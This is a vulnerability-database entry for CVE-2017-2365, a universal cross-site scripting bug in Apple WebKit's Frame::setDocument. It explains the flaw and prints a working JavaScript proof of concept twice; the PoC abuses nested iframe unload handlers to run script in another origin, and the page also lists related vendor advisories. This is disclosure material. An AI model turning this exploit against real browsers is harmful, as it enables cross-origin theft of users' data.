Lucene search
RootSSV:92706HistoryFeb 23, 2017 - 12:00 a.m.
Apple WebKit: UXSS via Frame::setDocument (CVE-2017-2365)
2017-02-2300:00:00
Root
www.seebug.org
12
0.01 Low
EPSS
Percentile
82.2%
Here’s a snippet of Frame::setDocument.
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction();
m_doc = newDocument.copyRef();
...
}
Before setting |m_doc| to |newDocument|, it calls |prepareForDestruction| that fires unload event handlers. If we call |Frame::setDocument| with the new document |a|, and call |Frame::setDocument| again with the new document |b| in the unload event handler. Then |prepareForDestruction| will be never called on |b|, which means the frame will be never detached from |b|.
PoC:
"use strict";
let f = document.documentElement.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
f.src = "javascript:''";
let b = f.contentDocument.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
let doc = f.contentDocument;
f.onload = () => {
f.onload = () => {
f.onload = null;
let s = doc.createElement("form");
s.action = "javascript:alert(location)";
s.submit();
};
f.src = "https://abc.xyz/";
};
};
};
f.src = "javascript:''";
Tested on Safari 10.0.2(12602.3.12.0.1).
"use strict";
let f = document.documentElement.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
f.src = "javascript:''";
let b = f.contentDocument.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
let doc = f.contentDocument;
f.onload = () => {
f.onload = () => {
f.onload = null;
let s = doc.createElement("form");
s.action = "javascript:alert(location)";
s.submit();
};
f.src = "https://abc.xyz/";
};
};
};
f.src = "javascript:''";
Related
cve
cve
CVE-2017-2365
2017-02-20 08:59:00
prion
prion
Design/Logic Flaw
2017-02-20 08:59:00
debiancve
debiancve
CVE-2017-2365
2017-02-20 08:59:00
zdt
zdt
Apple WebKit Frame::setDocument UXSS Exploit
2017-02-24 00:00:00
ubuntucve
ubuntucve
CVE-2017-2365
2017-02-16 00:00:00
alpinelinux
alpinelinux
CVE-2017-2365
2017-02-20 08:59:00
apple
apple
About the security content of Safari 10.0.3 - Apple Support
2017-01-23 06:32:43
About the security content of tvOS 10.1.1 - Apple Support
2017-03-28 11:25:09
About the security content of Safari 10.0.3
2017-01-23 00:00:00
nessus
nessus
Ubuntu 16.04 LTS : WebKitGTK+ vulnerabilities (USN-3200-1)
2017-02-17 00:00:00
macOS : Apple Safari < 10.0.3 Multiple Vulnerabilities
2017-01-26 00:00:00
Fedora 24 : webkitgtk4 (2017-b1abcbe695)
2017-02-28 00:00:00
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-02-16 00:00:00
fedora
fedora
[SECURITY] Fedora 24 Update: webkitgtk4-2.14.5-1.fc24
2017-02-24 23:19:20
[SECURITY] Fedora 25 Update: webkitgtk4-2.14.5-1.fc25
2017-02-24 22:51:07
openvas
openvas
Fedora Update for webkitgtk4 FEDORA-2017-0beb752b6e
2017-02-25 00:00:00
Fedora Update for webkitgtk4 FEDORA-2017-b1abcbe695
2017-02-25 00:00:00
Apple Safari Multiple Vulnerabilities-01 (Feb 2017)
2017-02-22 00:00:00
archlinux
archlinux
[ASA-201702-9] webkit2gtk: multiple issues
2017-02-11 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2017-11-06 15:08:25
Security update for webkit2gtk3 (important)
2017-11-10 18:22:30
Security update for webkit2gtk3 (important)
2018-02-01 00:14:30
mageia
mageia
Updated webkit2 packages fix security vulnerabilities
2017-03-02 18:11:17
gentoo
gentoo
WebKitGTK+: Multiple vulnerabilities
2017-06-07 00:00:00